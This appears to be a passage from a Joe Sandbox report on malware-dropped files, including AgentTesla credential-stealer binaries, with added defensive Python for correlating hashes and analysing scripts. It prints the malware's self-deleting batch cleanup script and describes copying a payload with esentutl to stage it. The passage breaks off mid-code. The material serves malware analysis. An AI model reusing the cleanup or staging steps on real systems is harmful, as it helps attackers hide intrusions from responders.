                                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):410
                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):410
                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
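Two things in this listing are easier to see by hash than by eye: the 410-byte .NET fusion log above is written, byte for byte, by two different processes (TrojanAIbot.exe and server_BTC.exe), and a PE drop can carry Malicious:true while only a small share of vendors flag it (3% and 29% in the entries above), so vendor ratio is a poor way to tie the drops together. The following is an added example of mine, not part of the Joe Sandbox report: a parser for the report's own Key:Value record layout, plus three correlations over the parsed records: content written by more than one process, drops matching a reference digest (for instance the SHA-256 of the submitted sample from the report's overview, which marks a drop as a copy of the sample rather than a new payload), and PE drops that are high-entropy or already marked malicious. The input is four of the records above reduced to the fields used; function names and the entropy threshold are assumptions.

```python
"""Parse Joe Sandbox dropped-file records and correlate them by content hash.

Added example, not part of the report.  Helper names and the 6.5 entropy
threshold are my own choices.
"""
import re
from collections import defaultdict

SHA256_RE = re.compile(r"[0-9a-f]{64}")

# Constructed input: four records from this section, reduced to the fields used here,
# in the report's own layout (one Key:Value per line, a new record at every Process line).
REPORT = r"""
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):1081856
Entropy (8bit):6.9272903664814445
MD5:31BC6907D6097A76BB1DD891CFC09B7A
SHA-256:F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
Malicious:true
Process:C:\Users\user\Desktop\x.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Size (bytes):62357
Entropy (8bit):4.705712327109906
MD5:B87F096CBC25570329E2BB59FEE57580
SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
Malicious:false
Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):410
Entropy (8bit):5.361827289088002
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):410
Entropy (8bit):5.361827289088002
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
Malicious:false
"""


def parse_records(text):
    """Split the listing into one dict per dropped file; a 'Process:' line opens a record."""
    records, cur = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        key, _, value = line.partition(":")        # first colon only: paths contain 'C:'
        key, value = key.strip(), value.strip()
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is None:
            raise ValueError("field before the first Process line: %r" % line)
        cur[key] = value
    return records


def _sha256(record):
    h = record.get("SHA-256", "").lower()
    return h if SHA256_RE.fullmatch(h) else None


def shared_drops(records):
    """SHA-256 -> sorted dropper paths, for content written by more than one distinct process."""
    by_hash = defaultdict(set)
    for r in records:
        if _sha256(r):
            by_hash[_sha256(r)].add(r["Process"])
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}


def copies_of(records, sha256):
    """Dropped files whose digest equals a reference digest (e.g. the submitted sample)."""
    return [r for r in records if _sha256(r) == sha256.lower()]


def suspicious_pe_drops(records, entropy_floor=6.5):
    """(process, sha256, entropy) for PE drops that look packed or are marked malicious."""
    out = []
    for r in records:
        if not r.get("File Type", "").startswith("PE32"):
            continue
        entropy = float(r.get("Entropy (8bit)", "0"))
        if entropy >= entropy_floor or r.get("Malicious", "").lower() == "true":
            out.append((r["Process"], _sha256(r), entropy))
    return out


if __name__ == "__main__":
    recs = parse_records(REPORT)
    for h, procs in shared_drops(recs).items():
        print("same content from %d processes: %s" % (len(procs), h))
    for proc, h, ent in suspicious_pe_drops(recs):
        print("PE drop by %s entropy %.2f %s" % (proc, ent, h))
```

On the four records this reports one shared digest (the fusion log, two droppers) and one PE drop (the esentutl.exe write, entropy 6.93, Malicious:true). Copying the full section into REPORT adds the four identical 60-byte PowerShell files, which shared_drops() will not list because the dropper path is the same powershell.exe for all of them; grouping by (hash, process count) instead of distinct process set would catch that case.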
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2232
                                                                                                              Entropy (8bit):5.379460230152629
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:fLHyIFKL3IZ2KRH9Ougos
                                                                                                              MD5:28F8623974ADE7FF0B49C3406E91E372
                                                                                                              SHA1:739F9DD671D9788B182A7A2D506A3919CA1C6098
                                                                                                              SHA-256:3CFE86C229FC35A9886CD7D5A46DFF98C0389C9294C35AA82FA4F907A72E8269
                                                                                                              SHA-512:93E2DC72E86EE4006A29687F845FA384C4B3DF320191C77E64CF3EF751D641BB51328F5F36F31FF781F07233A4D3BF24DBC57CCE9B943756257D0A1E0912AB32
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):250368
                                                                                                              Entropy (8bit):5.008874766930935
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                              MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                              SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                              SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):231936
                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):167
                                                                                                              Entropy (8bit):5.005860970615645
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:mKDDCMNvFbuov3DN+E2J5xAIJWAdEFKDwU1hGDN+E2J5xAInTRIJcLjIBQty:hWKdbuoLN723fJWAawDNeN723fT36
                                                                                                              MD5:70873B877515E74B4728AC25263D6983
                                                                                                              SHA1:A7489FB4E2ABC3CE703D1D545E3A0280616225C2
                                                                                                              SHA-256:45B68DB1F156AB959A987BCF26ACA9787E34E59E0FBD5162B5131FFAF25B7B29
                                                                                                              SHA-512:A77D8A7CF546EF30FD5AB6C770B65EC4FDA44D6EDB93D731AD556DA8EA24722A42E07F195102FE27A5A732B12334A02640DD2C8B9499A95711BB24CDF995E93C
                                                                                                              Malicious:false
                                                                                                              Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFB9.tmp.cmd" /f /q..
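The batch file above is a delayed cleanup script: it waits six seconds, deletes the dropper server_BTC.exe, then deletes itself (tmpFB9.tmp.cmd), leaving neither on disk for a responder. The Python below is an added triage example, not part of the Joe Sandbox report, that resolves every DEL target by tracking CD statements and reports whether a script deletes its parent and itself. The sample batch text is constructed from the preview (the report renders each CRLF as '..'); the script and parent locations are assumed, since the report gives only the file names.

```python
import re
from pathlib import PureWindowsPath

# Constructed from the preview in the report: the report renders each CRLF as '..'.
SAMPLE_BATCH = (
    "@echo off\r\n"
    "timeout 6 > NUL\r\n"
    "CD C:\\Users\\user\\AppData\\Local\\Temp\r\n"
    'DEL "server_BTC.exe" /f /q\r\n'
    "CD C:\\Users\\user\\AppData\\Local\\Temp\\\r\n"
    'DEL "tmpFB9.tmp.cmd" /f /q\r\n'
)
# Assumed locations: the report names the files but not where this .cmd was written.
SCRIPT_PATH = r"C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd"
PARENT_PATH = r"C:\Users\user\AppData\Local\Temp\server_BTC.exe"

TIMEOUT_RE = re.compile(r"(?i)^timeout\s+(?:/t\s+)?(\d+)")
CD_RE = re.compile(r'(?i)^(?:cd|chdir)\s+(?:/d\s+)?"?([^"]+?)"?\s*$')
DEL_RE = re.compile(r"(?i)^(?:del|erase)\s+(.*)$")
ARG_RE = re.compile(r'"([^"]+)"|(\S+)')  # quoted or bare argument


def _same_path(a, b):
    return b is not None and a.lower() == b.lower()


def analyse_batch(text, script_path, parent_path=None):
    """Track CD/DEL lines to resolve every deleted path; flag self and parent deletion."""
    cwd = PureWindowsPath(script_path).parent  # cmd.exe starts in the script's directory here
    delay, deletes = 0, []
    for raw in text.splitlines():
        line = raw.strip()
        if (m := TIMEOUT_RE.match(line)):
            delay += int(m.group(1))           # sleep before cleanup, e.g. 'timeout 6 > NUL'
        elif (m := CD_RE.match(line)):
            cwd = PureWindowsPath(m.group(1))  # pathlib drops a trailing backslash
        elif (m := DEL_RE.match(line)):
            for quoted, bare in ARG_RE.findall(m.group(1)):
                arg = quoted or bare
                if arg.startswith("/"):        # /f /q /s ... are switches, not targets
                    continue
                target = PureWindowsPath(arg)
                deletes.append(str(target if target.is_absolute() else cwd / target))
    return {
        "delay_seconds": delay,
        "deletes": deletes,
        "deletes_self": any(_same_path(t, script_path) for t in deletes),
        "deletes_parent": any(_same_path(t, parent_path) for t in deletes),
    }


if __name__ == "__main__":
    for key, value in analyse_batch(SAMPLE_BATCH, SCRIPT_PATH, PARENT_PATH).items():
        print(f"{key}: {value}")
```

A script that deletes its own parent process's image after a timeout is the signature of a dropper cleanup stage; on a live host the same logic applied to files written under %TEMP% by a freshly started process gives an early, cheap indicator before the payload is gone.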
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12320
                                                                                                              Entropy (8bit):7.983344573018528
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:GNtbe3n0t2AktAipGzf3QcXkl8SnAn4vNwd8X+mq7d+R2op9PGUCxFsfkynK4vFx:GNA3lLazVXkoANKJKp9udFszD2zC0YNr
                                                                                                              MD5:D52928BEB7E3EF0E1BA4B2B5127D7C2D
                                                                                                              SHA1:75AB6D5415569CFAD2113B1C2C69396E29F732CC
                                                                                                              SHA-256:52E1620C84EBFD4EA6BD5F8F7AA4A6E3261261C67FED9C4F09F0415A6AC6616B
                                                                                                              SHA-512:35D5CECD3FDAC3D4078E0D67C8D75B5757F34B5DD8AE94168953CB1E000CAA2FA72E386A64ED4FBA67FDBD5D2BEA70BF92BF1425E4163C1EE92F2C5AE305F0FA
                                                                                                              Malicious:false
                                                                                                              Preview:.N..h...m.^.,..m5g..C.mBg6.2c"^.Kt.YbkS.d.)...f..c...{.9...YF...[n.p.j9v...sC.@..c.....!..w|..X..#..s..iy?.g.(...9..|.B^..`D.Ml..dc,0.7.|S.<R.#>a.....8.*{.L.....t|..I...V.$g..ZH..G.}j!l.r..+JTx.8.:....XX.....Q......r.6.......9..+...b..^.#9.S...;..k/@vB..|..f..lnq.......4.3V..+o9i...wd5..[8../N..%.-....J....H/......io.k..>....v....{..q.&..%m..../..`0#...=....P.......H.M}....g...3....J.fe..s.3..e.........+...Ja........j.jP....^..ouRf.W..}....!f.T.Y.e..|.v.v..%.."cT..C....Zm...)..TTa.....2....`.h.t..."_..h.........I.....oG3. .*..M.)....he.........,..H......+...MclK.@.~].TjJ.5....}$.e..p.H.P....M.#K...)...C:..&.....a....M.J./......R.2|..X+]Y2.....g.3H8.....GE.....U.l....z].]..=.?..9..\....;.9rI,}._y.`).t|...|!...._N.-...$p._......;WI...`g..<W....+Q.r.....W.;.U..v*.$.(.2..l.*...H'..2.f.]~..h-#.a.V.*C..8......~.&.5.@.q.....W.@.....F.II...jg....5D.y)z ".t+x7...9.......-2.(........L..5..8.![...L~.)..C.T.j^v.~~T|..3&.p@.'c..R@...;pm..Q~..5
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):231936
                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 12 13:55:09 2024, mtime=Tue Nov 12 13:55:09 2024, atime=Tue Nov 12 13:55:07 2024, length=231936, window=
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1800
                                                                                                              Entropy (8bit):3.5174539760867622
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:8iHTcDylXUan3bByANsVs4FSnrlwO4ZTqlOBm:8iHTcDyl1nLBRr4+rlwZTqlS
                                                                                                              MD5:F93463814898869600E73F7B6F6F5E5F
                                                                                                              SHA1:D0AEABCEB57F8555EF1B200176B2A6DDBE4C6680
                                                                                                              SHA-256:6A21B311794AED786ED0E8FFA807E2085F2447A0F982049BF153D6C4DF9E92DA
                                                                                                              SHA-512:C53ADF33B6457A8F4781C7DA384287682F492D01564A4F2D5E4C3A63EBE72774CDBEEB8D82340072D35E60CE457E8E12C9DD6D707EE55158347812D64550BEFB
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...>....5..f...5..M4...5............................:..DG..Yr?.D..U..k0.&...&.......$..S.....@..5...~...5......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2lY.v...........................^.A.p.p.D.a.t.a...B.V.1.....lY.v..Roaming.@......EW<2lY.v..../.....................?...R.o.a.m.i.n.g.....T.1.....lY.v..ACCApi..>......lY.vlY.v....a.......................5.A.C.C.A.p.i.....l.2.....lY.v .TROJAN~1.EXE..P......lY.vlY.v............................y.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......g...............-.......f...........Pu.e.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.3.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe......................................................................................................
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):584
                                                                                                              Entropy (8bit):4.577748679815264
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:q82lxTzP1eSbZ7u0wxDDDDDDDDjCaY5xcVaYAaMaTB8NGNgL:bexTzdp7u0wQakxKaLat8NN
                                                                                                              MD5:CF86EBE29BA30115D6897C13D97CB13E
                                                                                                              SHA1:9C6EC113EA72063CA4AD63821B93072CFF3C8ED7
                                                                                                              SHA-256:33056DA535B20A3D9472950C3AAE1A5BE817D771CD7B7E97DBD5317C3F4D2D97
                                                                                                              SHA-512:A18D565B6A4578E965747D2C806B118E5F0C345F5152F2571555284C02EF68BD30074975C9582A1CB90701A2D019B5027F457CB7CC784701931936EA88900BC2
                                                                                                              Malicious:false
                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x108200 (1081856) (1 MB)....Total bytes written = 0x109000 (1085440) (1 MB).......Operation completed successfully in 0.141 seconds.....
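This esentutl.exe output records a COPY FILE operation (the esentutl /y copy mode) that duplicated x.exe into C:\Users\Public\Libraries\Wisrysxl.PIF, a signed Windows binary standing in for copy.exe so that the write comes from a trusted process. Note that the new name is the reverse of lxsyrsiW.pif, the process listed above as dropping the AgentTesla payload. The Python below is an added example, not part of the report, that parses both this output and an assumed esentutl command line (the report captures only esentutl's output, not its arguments) and lists why the copy looks like payload staging rather than ESE database maintenance.

```python
import re
from pathlib import PureWindowsPath

# Constructed from the esentutl.exe output captured in the report; the progress bar
# and overstrike control characters of the real file are omitted.
SAMPLE_OUTPUT = r"""
Initiating COPY FILE mode...
     Source File: C:\Users\user\Desktop\x.exe
Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF
Operation completed successfully in 0.141 seconds.
"""

# Hypothetical process-creation command line for the same copy (not in the report);
# 'esentutl /y <src> /d <dst> /o' is the documented copy syntax.
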